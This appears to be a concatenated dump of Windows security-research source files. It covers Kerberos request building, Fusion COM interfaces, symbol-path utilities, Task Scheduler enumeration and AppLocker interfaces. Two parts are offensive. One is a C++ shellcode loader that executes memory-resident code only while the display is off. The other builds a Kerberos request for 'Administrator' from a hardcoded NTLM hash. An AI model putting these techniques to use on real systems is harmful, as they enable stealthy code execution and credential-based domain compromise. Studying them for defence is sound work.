95 | KerbGenerateKDCReqBody(
96 | DomainName,
97 | SecurityPrincipal,
98 | &ReqBody
99 | );
100 |
101 | // Encode everything
102 | PBYTE Data = NULL;
103 | INT32 DataSize = 0x00;
104 | KerbGenerateFinalRequest(
105 | &Pvno,
106 | &MessageType,
107 | &EncryptedData,
108 | &Pac,
109 | &ReqBody,
110 | Request,
111 | RequestSize
112 | );
113 |
114 | // Exit
115 | return STATUS_SUCCESS;
116 | }
117 |
118 | ///
119 | /// Entry point.
120 | ///
121 | /// Application status code
122 | INT main() {
123 |
124 | LPCSTR ServerName = NULL;
125 | LPCSTR DomainName = NULL;
126 |
127 | // 1. Get domain controller information
128 | NTSTATUS Status = STATUS_SUCCESS;
129 | PDOMAIN_CONTROLLER_INFOA DCInformation = NULL;
130 | Status = GetDomainControllerInformation(
131 | NULL,
132 | DomainName,
133 | &DCInformation
134 | );
135 | if (!NT_SUCCESS(Status))
136 | return EXIT_FAILURE;
137 | printf("[>] Domain name : %s\r\n", DCInformation->DomainName);
138 | printf("[>] Domain controller: %s (%s)\r\n",
139 | DCInformation->DomainControllerName,
140 | DCInformation->DomainControllerAddress
141 | );
142 |
143 | // Convert the NTLM to byte array
144 | LPSTR NtlmHash = "7FACDC498ED1680C4FD1448319A8C04F";
145 | PBYTE NtlmHashArray = NULL;
146 | INT32 NtlmHashArraySize = NULL;
147 | HexStringToHex(NtlmHash, &NtlmHashArray, &NtlmHashArraySize);
148 |
149 | // 2. Build AS-REQ with pre-auth
150 | LPSTR SecurityPrincipal = "Administrator";
151 |
152 |
153 | PBYTE Request = NULL;
154 | INT32 RequestSize = 0x00;
155 | GenerateASRequest(
156 | NtlmHashArray,
157 | DCInformation->DomainName,
158 | SecurityPrincipal,
159 | &Request,
160 | &RequestSize
161 | );
162 |
163 | // 3. Send the data
164 | PBYTE Response = NULL;
165 | INT32 ResponseSize = 0x00;
166 | SockSendKerberosASRequest(
167 | DCInformation->DomainControllerAddress,
168 | Request,
169 | RequestSize,
170 | &Response,
171 | &ResponseSize
172 | );
173 |
174 | // x. Cleanup and exit
175 | exit:
176 | if (DCInformation != NULL)
177 | NetApiBufferFree(DCInformation);
178 | return EXIT_SUCCESS;
179 | }
--------------------------------------------------------------------------------
/Fusion/FindAssembly/Fusion/IAssemblyCache.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace FindAssembly.Fusion {
5 |
6 | ///
7 | /// Represents the global assembly cache for use by the fusion technology.
8 | ///
9 | [ComImport, Guid("E707DCDE-D1CD-11D2-BAB9-00C04F8ECEAE")]
10 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
11 | public interface IAssemblyCache {
12 |
13 | ///
14 | /// Uninstalls the specified assembly from the global assembly cache.
15 | ///
16 | /// Flags defined in Fusion.idl.
17 | /// The name of the assembly to uninstall.
18 | /// A FUSION_INSTALL_REFERENCE structure that contains the installation data for the assembly.
19 | /// One of the disposition values defined in Fusion.idl. Possible values include the following:
20 | ///
21 | /// - IASSEMBLYCACHE_UNINSTALL_DISPOSITION_UNINSTALLED (1)
22 | /// - IASSEMBLYCACHE_UNINSTALL_DISPOSITION_STILL_IN_USE (2)
23 | /// - IASSEMBLYCACHE_UNINSTALL_DISPOSITION_ALREADY_UNINSTALLED (3)
24 | /// - IASSEMBLYCACHE_UNINSTALL_DISPOSITION_DELETE_PENDING (4)
25 | /// - IASSEMBLYCACHE_UNINSTALL_DISPOSITION_HAS_INSTALL_REFERENCES (5)
26 | /// - IASSEMBLYCACHE_UNINSTALL_DISPOSITION_REFERENCE_NOT_FOUND (6)
27 | ///
28 | ///
29 | /// HRESULT
30 | [PreserveSig]
31 | uint UninstallAssembly(
32 | uint dwFlags,
33 | [MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName,
34 | [MarshalAs(UnmanagedType.LPArray)] FUSION_INSTALL_REFERENCE[] pRefData,
35 | out uint pulDisposition
36 | );
37 |
38 | ///
39 | /// Gets the requested data about the specified assembly.
40 | ///
41 | /// Flags defined in Fusion.idl. The following values are supported:
42 | ///
43 | /// - QUERYASMINFO_FLAG_VALIDATE (0x00000001)
44 | /// - QUERYASMINFO_FLAG_GETSIZE (0x00000002)
45 | ///
46 | ///
47 | /// The name of the assembly for which data will be retrieved.
48 | /// An ASSEMBLY_INFO structure that contains data about the assembly.
49 | /// HRESULT
50 | [PreserveSig]
51 | uint QueryAssemblyInfo(
52 | uint dwFlags,
53 | [MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName,
54 | ref ASSEMBLY_INFO pAsmInfo
55 | );
56 |
57 | ///
58 | /// Gets a reference to a new IAssemblyCacheItem object.
59 | ///
60 | /// Flags defined in Fusion.idl. The following values are supported:
61 | ///
62 | /// - IASSEMBLYCACHE_INSTALL_FLAG_REFRESH (0x00000001)
63 | /// - IASSEMBLYCACHE_INSTALL_FLAG_FORCE_REFRESH (0x00000002)
64 | ///
65 | ///
66 | /// Reserved for future extensibility. pvReserved must be a null reference.
67 | /// The returned IAssemblyCacheItem pointer.
68 | /// Uncanonicalized, comma-separated name=value pairs.
69 | /// HRESULT
70 | [PreserveSig]
71 | uint CreateAssemblyCacheItem(
72 | uint dwFlags,
73 | IntPtr pvReserved,
74 | out IAssemblyCacheItem ppAsmItem,
75 | [MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName
76 | );
77 |
78 | ///
79 | /// Reserved for internal use by the fusion technology.
80 | ///
81 | /// The returned IUnknown pointer.
82 | /// HRESULT
83 | [PreserveSig]
84 | uint CreateAssemblyScavenger([MarshalAs(UnmanagedType.IUnknown)] out object ppAsmScavenger);
85 |
86 | ///
87 | /// Installs the specified assembly in the global assembly cache.
88 | ///
89 | /// Flags defined in Fusion.idl. The following values are supported:
90 | ///
91 | /// - IASSEMBLYCACHE_INSTALL_FLAG_REFRESH (0x00000001)
92 | /// - IASSEMBLYCACHE_INSTALL_FLAG_FORCE_REFRESH (0x00000002)
93 | ///
94 | ///
95 | /// The path to the manifest for the assembly to install.
96 | /// A FUSION_INSTALL_REFERENCE structure that contains data for the installation.
97 | /// HRESULT
98 | [PreserveSig]
99 | uint InstallAssembly(
100 | uint dwFlags,
101 | [MarshalAs(UnmanagedType.LPWStr)] string pszManifestFilePath,
102 | [MarshalAs(UnmanagedType.LPArray)] FUSION_INSTALL_REFERENCE[] pRefData
103 | );
104 | }
105 | }
106 |
--------------------------------------------------------------------------------
/DIA/src/dirutil.c:
--------------------------------------------------------------------------------
1 | /*+================================================================================================
2 | Module Name: dirutil.c
3 | Author : Paul L. (@am0nsec)
4 | Origin : https://github.com/am0nsec/wspe/
5 | Copyright : This project has been released under the GNU Public License v3 license.
6 |
7 | Abstract:
8 | Windows Directory utility code.
9 | Used to change directory to the "PDB" folder and get the correct symbol server search path.
10 |
11 | ================================================================================================+*/
12 |
13 | #include
14 | #include
15 |
16 | #include "dirutil.h"
17 |
18 | // Directory before changing.
19 | PWCHAR g_DefaultDirectory = NULL;
20 |
21 | // Directory after changing.
22 | PWCHAR g_NewDirectory = NULL;
23 |
24 | // The symbol server search path.
25 | PWCHAR g_SymSrvSearchPath = NULL;
26 |
27 | // Path to the msdiaXXX.dll module.
28 | PWCHAR g_ModulePath = NULL;
29 |
30 | _Use_decl_annotations_
31 | HRESULT ChangeDirectory(
32 | _In_ PWCHAR Directory,
33 | _In_ DWORD Size
34 | ) {
35 |
36 | // Get the current path
37 | DWORD dwCurrentDirectory = GetCurrentDirectoryW(0x00, NULL);
38 | DWORD dwBuffer = 0x100;
39 | while (dwCurrentDirectory > dwBuffer)
40 | dwBuffer += 0x100;
41 |
42 | // Allocate memory for the full current path
43 | g_DefaultDirectory = calloc(1, dwBuffer);
44 | if (g_DefaultDirectory == NULL)
45 | return E_OUTOFMEMORY;
46 | GetCurrentDirectoryW(dwBuffer, g_DefaultDirectory);
47 |
48 | // Allocate memory for the new path
49 | g_NewDirectory = calloc(1, dwBuffer);
50 | if (g_NewDirectory == NULL) {
51 | free(g_DefaultDirectory);
52 | g_DefaultDirectory = NULL;
53 |
54 | return E_FAIL;
55 | }
56 |
57 | // Make sure we can build the path
58 | if (FAILED(StringCbPrintfW(g_NewDirectory, dwBuffer, L"%s\\%s\\\0", g_DefaultDirectory, Directory))) {
59 | free(g_NewDirectory);
60 | free(g_DefaultDirectory);
61 |
62 | g_NewDirectory = NULL;
63 | g_DefaultDirectory = NULL;
64 |
65 | return E_FAIL;
66 | }
67 |
68 | // Set the path
69 | if (!SetCurrentDirectoryW(g_NewDirectory)) {
70 | free(g_NewDirectory);
71 | free(g_DefaultDirectory);
72 |
73 | g_NewDirectory = NULL;
74 | g_DefaultDirectory = NULL;
75 |
76 | return E_FAIL;
77 | }
78 |
79 | return S_OK;
80 | }
81 |
82 |
83 | _Use_decl_annotations_
84 | PWCHAR GetSymSrvSearchPath(
85 | VOID
86 | ) {
87 | if (g_SymSrvSearchPath != NULL)
88 | return g_SymSrvSearchPath;
89 |
90 | // Local Stack Variables
91 | CONST PWCHAR Sym = L"symsrv";
92 | CONST PWCHAR Dll = L"symsrv.dll";
93 | CONST PWCHAR Web = L"https://msdl.microsoft.com/download/symbols";
94 |
95 | // Calculate the size of the buffer to allocate
96 | DWORD dwBuffer = 0x100;
97 | DWORD dwSize = lstrlenW(Sym) + lstrlenW(Dll) + lstrlenW(Web) + (sizeof(WCHAR) * 4) + lstrlenW(g_NewDirectory);
98 | while (dwBuffer < dwSize)
99 | dwBuffer += 0x100;
100 |
101 | g_SymSrvSearchPath = calloc(1, dwBuffer);
102 | if (g_SymSrvSearchPath == NULL)
103 | return NULL;
104 |
105 | // Assemble the whole strign now
106 | HRESULT Result = StringCbPrintfW(
107 | g_SymSrvSearchPath,
108 | dwBuffer,
109 | L"%s*%s*%s*%s\0",
110 | Sym,
111 | Dll,
112 | g_NewDirectory,
113 | Web
114 | );
115 | if (FAILED(Result)) {
116 | free(g_SymSrvSearchPath);
117 | g_SymSrvSearchPath = NULL;
118 | }
119 |
120 | // Path value by reference
121 | return g_SymSrvSearchPath;
122 | }
123 |
124 |
125 | PWCHAR GetMsdiaModulePath(
126 | VOID
127 | ) {
128 | // Get current directory
129 | DWORD dwCurrentDirectory = GetCurrentDirectoryW(0x00, NULL);
130 | DWORD dwBuffer = 0x100;
131 | while (dwCurrentDirectory > dwBuffer)
132 | dwBuffer += 0x100;
133 |
134 | // Allocate memory for the current path
135 | PWCHAR CurrentDirectory = calloc(1, dwBuffer);
136 | if (CurrentDirectory == NULL)
137 | return E_OUTOFMEMORY;
138 | GetCurrentDirectoryW(dwBuffer, CurrentDirectory);
139 |
140 | // Calculate final size
141 | CONST PWCHAR Dir = L"msdia";
142 | CONST PWCHAR Dll = L"msdia140.dll";
143 |
144 | DWORD dwSize = lstrlenW(Dir) + lstrlenW(Dll) + (sizeof(WCHAR) * 4) + dwCurrentDirectory;
145 | while (dwBuffer < dwSize)
146 | dwBuffer += 0x100;
147 |
148 | // Assemble the path
149 | g_ModulePath = calloc(1, dwBuffer);
150 | if (g_ModulePath == NULL)
151 | return NULL;
152 |
153 | // Assemble the whole strign now
154 | HRESULT Result = StringCbPrintfW(
155 | g_ModulePath,
156 | dwBuffer,
157 | L"%s\\%s\\%s\0",
158 | CurrentDirectory,
159 | Dir,
160 | Dll
161 | );
162 | if (FAILED(Result)) {
163 | free(g_ModulePath);
164 | g_ModulePath = NULL;
165 | }
166 |
167 | // Path value by reference
168 | return g_ModulePath;
169 | }
170 |
171 |
172 | _Use_decl_annotations_
173 | HRESULT ResetDirectory(
174 | VOID
175 | ) {
176 | // Change directory
177 | HRESULT Result = S_OK;
178 | if (g_DefaultDirectory != NULL)
179 | Result = SetCurrentDirectoryW(g_DefaultDirectory) == TRUE ? S_OK : E_FAIL;
180 |
181 | // Free memory
182 | if (g_DefaultDirectory != NULL) {
183 | free(g_DefaultDirectory);
184 | g_DefaultDirectory = NULL;
185 | }
186 | if (g_SymSrvSearchPath != NULL) {
187 | free(g_SymSrvSearchPath);
188 | g_SymSrvSearchPath = NULL;
189 | }
190 | if (g_NewDirectory != NULL) {
191 | free(g_NewDirectory);
192 | g_NewDirectory = NULL;
193 | }
194 | if (g_ModulePath != NULL) {
195 | free(g_ModulePath);
196 | g_ModulePath = NULL;
197 | }
198 |
199 | return Result;
200 | }
201 |
--------------------------------------------------------------------------------
/Fusion/FindAssembly/Fusion/IAssemblyName.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 | using System.Runtime.InteropServices;
4 |
5 | namespace FindAssembly.Fusion {
6 |
7 | ///
8 | /// Provides methods for describing and working with an assembly's unique identity.
9 | ///
10 | [ComImport, Guid("CD193BC0-B4BC-11d2-9833-00C04FC31D2E")]
11 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
12 | public interface IAssemblyName {
13 |
14 | ///
15 | /// Sets the value of the property referenced by the specified property identifier.
16 | ///
17 | /// The unique identifier of the property whose value will be set.
18 | /// The value to which to set the property referenced by PropertyId.
19 | /// The size, in bytes, of pvProperty.
20 | /// HRESULT
21 | [PreserveSig]
22 | uint SetProperty(
23 | uint PropertyId,
24 | IntPtr pvProperty,
25 | uint cbProperty
26 | );
27 |
28 | ///
29 | /// Gets a pointer to the property referenced by the specified property identifier.
30 | ///
31 | /// The unique identifier for the requested property.
32 | /// The returned property data.
33 | /// The size, in bytes, of pvProperty.
34 | /// HRESULT
35 | [PreserveSig]
36 | uint GetProperty(
37 | uint PropertyId,
38 | IntPtr pvProperty,
39 | ref uint pcbProperty
40 | );
41 |
42 | ///
43 | /// Allows this IAssemblyName object to release resources and perform other cleanup operations before its destructor is called.
44 | ///
45 | /// HRESULT
46 | [PreserveSig]
47 | uint Finalize();
48 |
49 | ///
50 | /// Gets the human-readable name of the assembly referenced by this IAssemblyName object.
51 | ///
52 | /// The string buffer that contains the name of the referenced assembly.
53 | /// The size of szDisplayName in wide characters, including a null terminator character.
54 | /// A bitwise combination of ASM_DISPLAY_FLAGS values that influence the features of szDisplayName.
55 | /// HRESULT
56 | [PreserveSig]
57 | uint GetDisplayName(
58 | [Out, MarshalAs(UnmanagedType.LPWStr)] StringBuilder szDisplayName,
59 | ref uint pccDisplayName,
60 | uint dwDisplayFlags
61 | );
62 |
63 | ///
64 | /// Undocumented.
65 | ///
66 | /// HRESULT
67 | [PreserveSig]
68 | uint Reserved(
69 | ref Guid refIID,
70 | object pUnkReserved1,
71 | object pUnkReserved2,
72 | string szReserved,
73 | long llReserved,
74 | IntPtr pvReserved,
75 | uint cbReserved,
76 | out IntPtr ppReserved
77 | );
78 |
79 | ///
80 | /// Gets the simple, unencrypted name of the assembly referenced by this IAssemblyName object.
81 | ///
82 | /// The size of pwzName in wide characters, including the null terminator character.
83 | /// A buffer to hold the name of the referenced assembly.
84 | /// HRESULT
85 | [PreserveSig]
86 | uint GetName(
87 | ref uint lpcwBuffer,
88 | [Out, MarshalAs(UnmanagedType.LPWStr)] StringBuilder pwzName
89 | );
90 |
91 | ///
92 | /// Gets the version information for the assembly referenced by this IAssemblyName object.
93 | ///
94 | /// The high 32 bits of the version.
95 | /// The low 32 bits of the version.
96 | /// HRESULT
97 | [PreserveSig]
98 | uint GetVersion(
99 | out uint pdwVersionHi,
100 | out uint pdwVersionLow
101 | );
102 |
103 | ///
104 | /// Determines whether a specified IAssemblyName object is equal to this IAssemblyName, based on the specified comparison flags.
105 | ///
106 | /// The IAssemblyName object to which to compare this IAssemblyName.
107 | /// A bitwise combination of ASM_CMP_FLAGS values that influence the comparison.
108 | /// HRESULT
109 | [PreserveSig]
110 | uint IsEqual(
111 | IAssemblyName pName,
112 | uint dwCmpFlags
113 | );
114 |
115 | ///
116 | /// Creates a shallow copy of this IAssemblyName object.
117 | ///
118 | /// The returned copy of this IAssemblyName object.
119 | /// HRESULT
120 | [PreserveSig]
121 | uint Clone(
122 | out IAssemblyName pName
123 | );
124 | }
125 | }
126 |
--------------------------------------------------------------------------------
/Power Management/deus_somnum_user32.cpp:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | // Global variables
5 | PPOWERBROADCAST_SETTING pPowerSettings;
6 | HPOWERNOTIFY hPowerNorification;
7 | HINSTANCE hGlobalInstance;
8 | WCHAR lpAtomClassName[36];
9 | ATOM AtomClass;DWORD dwError;
10 | DWORD dwHostThreadId;
11 | HANDLE hHostThread;
12 |
13 | LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
14 | ATOM Win64RegisterCallBackNotifications(VOID);
15 | VOID Cleanup(VOID);
16 |
17 | int wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd) {
18 | //smelly & am0nsec
19 | lpAtomClassName[0] = 's'; lpAtomClassName[1] = 'm'; lpAtomClassName[2] = 'e';
20 | lpAtomClassName[3] = 'l'; lpAtomClassName[4] = 'l'; lpAtomClassName[5] = 'y';
21 | lpAtomClassName[6] = ' '; lpAtomClassName[7] = '&'; lpAtomClassName[8] = ' ';
22 | lpAtomClassName[9] = 'a'; lpAtomClassName[10] = 'm'; lpAtomClassName[11] = '0';
23 | lpAtomClassName[12] = 'n'; lpAtomClassName[13] = 's'; lpAtomClassName[14] = 'e';
24 | lpAtomClassName[15] = 'c'; lpAtomClassName[16] = '\0';
25 |
26 | hGlobalInstance = hInstance;
27 | AtomClass = Win64RegisterCallBackNotifications();
28 | if (AtomClass == 0x0) {
29 | dwError = ::GetLastError();
30 | Cleanup();
31 | return dwError;
32 | }
33 |
34 | HWND hWindow = ::CreateWindowEx(0, lpAtomClassName, NULL, 0, 0, 0, 0, 0, HWND_MESSAGE,NULL, hInstance, NULL);
35 | if (hWindow == NULL) {
36 | dwError = ::GetLastError();
37 | Cleanup();
38 | return dwError;
39 | }
40 |
41 | INT nReturn;
42 | MSG Message;
43 | while ((nReturn = ::GetMessage(&Message, NULL, 0, 0)) != 0) {
44 | ::TranslateMessage(&Message);
45 | ::DispatchMessage(&Message);
46 | }
47 |
48 | if (hWindow)
49 | ::CloseWindow(hWindow);
50 | Cleanup();
51 | return 0;
52 | }
53 |
54 | ATOM Win64RegisterCallBackNotifications(VOID) {
55 | // Window class information
56 | WNDCLASSEX Wnd = {};
57 |
58 | Wnd.cbSize = sizeof(WNDCLASSEX);
59 | Wnd.style = 0;
60 | Wnd.lpfnWndProc = (WNDPROC)WindowProc;
61 | Wnd.cbClsExtra = 0;
62 | Wnd.cbWndExtra = 0;
63 | Wnd.hInstance = hGlobalInstance;
64 | Wnd.hIcon = NULL;
65 | Wnd.hCursor = NULL;
66 | Wnd.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
67 | Wnd.lpszMenuName = NULL;
68 | Wnd.lpszClassName = lpAtomClassName;
69 | Wnd.hIconSm = NULL;
70 |
71 | return ::RegisterClassEx(&Wnd);
72 | }
73 |
74 | LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
75 | switch (uMsg) {
76 | case WM_CREATE: {
77 | hPowerNorification = ::RegisterPowerSettingNotification(hwnd, &GUID_CONSOLE_DISPLAY_STATE, DEVICE_NOTIFY_WINDOW_HANDLE);
78 | if (hPowerNorification == NULL) {
79 | ::SendMessage(hwnd, WM_CLOSE, (WPARAM)0, (LPARAM)0);
80 | break;
81 | }
82 |
83 | ::SetThreadExecutionState(ES_AWAYMODE_REQUIRED | ES_CONTINUOUS | ES_SYSTEM_REQUIRED);
84 | break;
85 | }
86 |
87 | case WM_CLOSE: {
88 | Cleanup();
89 | ::UnregisterPowerSettingNotification(hPowerNorification);
90 | ::ExitProcess(0x01);
91 | }
92 |
93 | case WM_POWERBROADCAST: {
94 | pPowerSettings = (PPOWERBROADCAST_SETTING)lParam;
95 | if (pPowerSettings->PowerSetting == GUID_CONSOLE_DISPLAY_STATE) {
96 | if (pPowerSettings->Data[0] == 0x02 || pPowerSettings->Data[0] == 0x00) {
97 | // Check if display off or dimmed
98 | if (hHostThread == NULL) {
99 | char shellcode[] = "";
100 |
101 | LPVOID lpAddress = ::VirtualAlloc(NULL, sizeof(shellcode),MEM_COMMIT, PAGE_READWRITE);
102 | ::RtlMoveMemory(lpAddress, shellcode, sizeof(shellcode));
103 |
104 | DWORD dwOldProtect;
105 | ::VirtualProtect(lpAddress, sizeof(shellcode),PAGE_EXECUTE_READ, &dwOldProtect);
106 |
107 | hHostThread = ::CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)lpAddress, NULL, 0, &dwHostThreadId);
108 | ::WaitForSingleObject(hHostThread, 2000);
109 |
110 | if (hHostThread == NULL) {
111 | ::SendMessage(hwnd, WM_CLOSE, (WPARAM)0, (LPARAM)0);
112 | break;
113 | }
114 | } else {
115 | ::ResumeThread(hHostThread);
116 | }
117 | } elseif (pPowerSettings->Data[0] == 0x01) {
118 | // Display back on
119 | if (hHostThread != NULL)
120 | ::SuspendThread(hHostThread);
121 | }
122 | }
123 | break;
124 | }
125 |
126 | default: {
127 | return ::DefWindowProc(hwnd, uMsg, wParam, lParam);
128 | }
129 | }
130 |
131 | return 0;
132 | }
133 |
134 | VOID Cleanup(VOID) {
135 | if (AtomClass != 0x0) {
136 | ::UnregisterClass(lpAtomClassName, hGlobalInstance);
137 | }
138 | }
139 |
--------------------------------------------------------------------------------
/Task Scheduler/enumerate_tasks.cpp:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "taskschd.lib")
6 |
7 | VOID wprintf_indent(LPCWSTR string, DWORD indent, BOOL bIsTaskName) {
8 | BSTR bstrString = ::SysAllocString(string);
9 | for (DWORD i = 0; i < indent; i++) {
10 | ::wprintf(L" ");
11 | }
12 | if (bIsTaskName) {
13 | ::wprintf(L"- ");
14 | } else {
15 | ::wprintf(L"+ ");
16 | }
17 | ::wprintf(L"%s\n", string);
18 | ::SysFreeString(bstrString);
19 | }
20 |
21 | BOOL IsAdministrator() {
22 | BOOL bSuccess = FALSE;
23 | HANDLE hProcessToken = NULL;
24 |
25 | bSuccess = ::OpenProcessToken(::GetCurrentProcess(), TOKEN_QUERY, &hProcessToken);
26 | if (bSuccess) {
27 | TOKEN_ELEVATION bIsElevated;
28 | DWORD dwSize = sizeof(bIsElevated);
29 |
30 | bSuccess = GetTokenInformation(hProcessToken, TokenElevation, &bIsElevated, dwSize, &dwSize);
31 | bSuccess = bIsElevated.TokenIsElevated;
32 | }
33 |
34 | if (hProcessToken) {
35 | ::CloseHandle(hProcessToken);
36 | }
37 |
38 | return bSuccess;
39 | }
40 |
41 | BOOL InitialiseCOM() {
42 | HRESULT hResult;
43 |
44 | hResult = ::CoInitialize(NULL);
45 | if (!SUCCEEDED(hResult)) {
46 | ::wprintf(L"[>] [-] Error while initialising COM\n");
47 | return FALSE;
48 | }
49 |
50 | hResult = ::CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, 0, NULL);
51 | if (!SUCCEEDED(hResult)) {
52 | ::wprintf(L"[-] Error while initialising COM security\n");
53 | return FALSE;
54 | }
55 |
56 | return TRUE;
57 | }
58 |
59 | BOOL CreateTaskServiceInstance(ITaskService*& pTaskService) {
60 | HRESULT hResult = ::CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, IID_ITaskService, (void**)&pTaskService);
61 | if (!SUCCEEDED(hResult)) {
62 | ::wprintf(L"[-] Error while creating TaskService instance\n");
63 | return FALSE;
64 | }
65 |
66 | return TRUE;
67 | }
68 |
69 | BOOL ConnectToTaskService(ITaskService*& pTaskService) {
70 | VARIANT username;
71 | VARIANT password;
72 | VARIANT server;
73 | VARIANT domain;
74 | ::VariantInit(&username);
75 | ::VariantInit(&password);
76 | ::VariantInit(&server);
77 | ::VariantInit(&domain);
78 |
79 | HRESULT hResult = pTaskService->Connect(server, username, domain, password);
80 | if (!SUCCEEDED(hResult)) {
81 | ::wprintf(L"[-] Error while connecting to the TaskService\n");
82 | return FALSE;
83 | }
84 |
85 | ::VariantClear(&username);
86 | ::VariantClear(&password);
87 | ::VariantClear(&server);
88 | ::VariantClear(&domain);
89 | return TRUE;
90 | }
91 |
92 | BOOL GetRootTaskFolder(ITaskFolder*& pTaskFolder, ITaskService*& pTaskService, BSTR& bstrRootFolder) {
93 | HRESULT hResult = pTaskService->GetFolder(bstrRootFolder, &pTaskFolder);
94 | if (!SUCCEEDED(hResult)) {
95 | ::wprintf(L"[-] Error while getting the task root folder\n");
96 | return FALSE;
97 | }
98 |
99 | return TRUE;
100 | }
101 |
102 | BOOL EnumerateTasks(ITaskFolder*& pTaskFolder, DWORD indent) {
103 | HRESULT hResult;
104 |
105 | // Get current folder name
106 | BSTR bstrFolderName = NULL;
107 | pTaskFolder->get_Name(&bstrFolderName);
108 | wprintf_indent(bstrFolderName, indent, FALSE);
109 |
110 | // Get tasks in folder
111 | LONG lTasks = 0;
112 | IRegisteredTaskCollection* pTaskCollection = NULL;
113 | pTaskFolder->GetTasks(TASK_ENUM_HIDDEN, &pTaskCollection);
114 | pTaskCollection->get_Count(&lTasks);
115 |
116 | // Loop through all tasks
117 | for (LONG i = 0; i < lTasks; i++) {
118 | IRegisteredTask* pTask = NULL;
119 | VARIANT item;
120 | ::VariantInit(&item);
121 | item.vt = VT_I4;
122 | item.lVal = i + 1;
123 | hResult = pTaskCollection->get_Item(item, &pTask);
124 | if (SUCCEEDED(hResult)) {
125 | BSTR bstrTaskName = NULL;
126 | hResult = pTask->get_Name(&bstrTaskName);
127 | if (SUCCEEDED(hResult)) {
128 | wprintf_indent(bstrTaskName, indent + 3, TRUE);
129 | }
130 | ::SysFreeString(bstrTaskName);
131 | } else {
132 | ::wprintf(L"[-] Error while retriving task %d\n", i + 1);
133 | }
134 | }
135 |
136 | // Get all sub folders in current folder
137 | LONG lTaskFolders = 0;
138 | ITaskFolderCollection* pNewTaskFolderCollections = NULL;
139 | pTaskFolder->GetFolders(0, &pNewTaskFolderCollections);
140 | pNewTaskFolderCollections->get_Count(&lTaskFolders);
141 |
142 | // Loop through all the folders
143 | for (LONG i = 0; i < lTaskFolders; i++) {
144 | ITaskFolder* pNewTaskFolder = NULL;
145 | VARIANT item;
146 | ::VariantInit(&item);
147 | item.vt = VT_I4;
148 | item.lVal = i + 1;
149 |
150 | pNewTaskFolderCollections->get_Item(item, &pNewTaskFolder);
151 | EnumerateTasks(pNewTaskFolder, indent + 3);
152 | pNewTaskFolder->Release();
153 | }
154 |
155 | pTaskCollection->Release();
156 | return TRUE;
157 | }
158 |
159 | INT wmain() {
160 | ::wprintf(L"[>] Windows Task Scheduler Experiments\n");
161 | ::wprintf(L"[>] Author: Paul Laîné (@am0nsec)\n");
162 | ::wprintf(L" ----------------------------------------------------------------------------------\n\n");
163 |
164 | if (IsAdministrator())
165 | ::wprintf(L"[>] Executed with elevated privileges\n\n");
166 | else
167 | ::wprintf(L"[>] Executed without elevated privileges\n\n");
168 |
169 | ITaskService* pTaskService = NULL;
170 | ITaskFolder* pTaskFolder = NULL;
171 | IRegisteredTaskCollection* pTaskCollection = NULL;
172 | BSTR bstrRootFolder = ::SysAllocString(L"\\");
173 |
174 | InitialiseCOM();
175 | CreateTaskServiceInstance(pTaskService);
176 | ConnectToTaskService(pTaskService);
177 | GetRootTaskFolder(pTaskFolder, pTaskService, bstrRootFolder);
178 |
179 | ::wprintf(L"[>] Parsing tasks ...\n");
180 | EnumerateTasks(pTaskFolder, 0);
181 |
182 | // Cleanup
183 | ::wprintf(L"\n[>] Cleaning everything ...\n");
184 | pTaskFolder->Release();
185 | pTaskService->Release();
186 | ::SysFreeString(bstrRootFolder);
187 | ::CoUninitialize();
188 | ::wprintf(L"[+] Cleaning everything ... OK\n\n");
189 |
190 | return 0;
191 | }
192 |
--------------------------------------------------------------------------------
/AppLocker/List Policies/interfaces.h:
--------------------------------------------------------------------------------
1 | /**
2 | * @file interfaces.h
3 | * @date 02-08-2020
4 | * @author Paul Laîné (@am0nsec)
5 | * @version 1.0
6 | * @brief Enumerate AppLocker policies via IAppIdPolicyHandler COM interface.
7 | * @details
8 | * @link https://ntamonsec.blogspot.com/
9 | *
10 | * @copyright This project has been released under the GNU Public License v3 license.
11 | */
12 | #include
13 |
14 | #ifndef _INTERFACES_H
15 | #define _INTERFACES_H
16 |
17 | /**
18 | * @brief GUID of the IAppIdPolicyHandler COM interface: B6FEA19E-32DD-4367-B5B7-2F5DA140E87D
19 | */
20 | CONST IID IID_IAppIdPolicyHandler = { 0xB6FEA19E, 0x32DD, 0x4367, {0xB5, 0xB7, 0x2F, 0x5D, 0xA1, 0x40, 0xE8, 0x7D} };
21 |
22 | /**
23 | * @brief GUID of the IAppIdPolicyHandler class factory: F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3
24 | */
25 | CONST IID CLSID_AppIdPolicyHandlerClass = { 0xF1ED7D4C, 0xF863, 0x4DE6, {0xA1, 0xCA, 0x72, 0x53, 0xEF, 0xDE, 0xE1, 0xF3} };
26 |
27 | typedef interface IAppIdPolicyHandler IAppIdPolicyHandler;
28 |
29 | #if defined(__cplusplus) && !defined(CINTERFACE)
30 |
31 | MIDL_INTERFACE("B6FEA19E-32DD-4367-B5B7-2F5DA140E87D")
32 | IAppIdPolicyHandler : public IUnknown, public IDispatch {
33 | public:
34 | virtual VOID STDMETHODCALLTYPE SetPolicy (
35 | _In_ BSTR bstrLdapPath,
36 | _In_ BSTR bstrXmlPolicy
37 | );
38 |
39 | virtual BSTR STDMETHODCALLTYPE GetPolicy(
40 | _In_ BSTR bstrLdapPath,
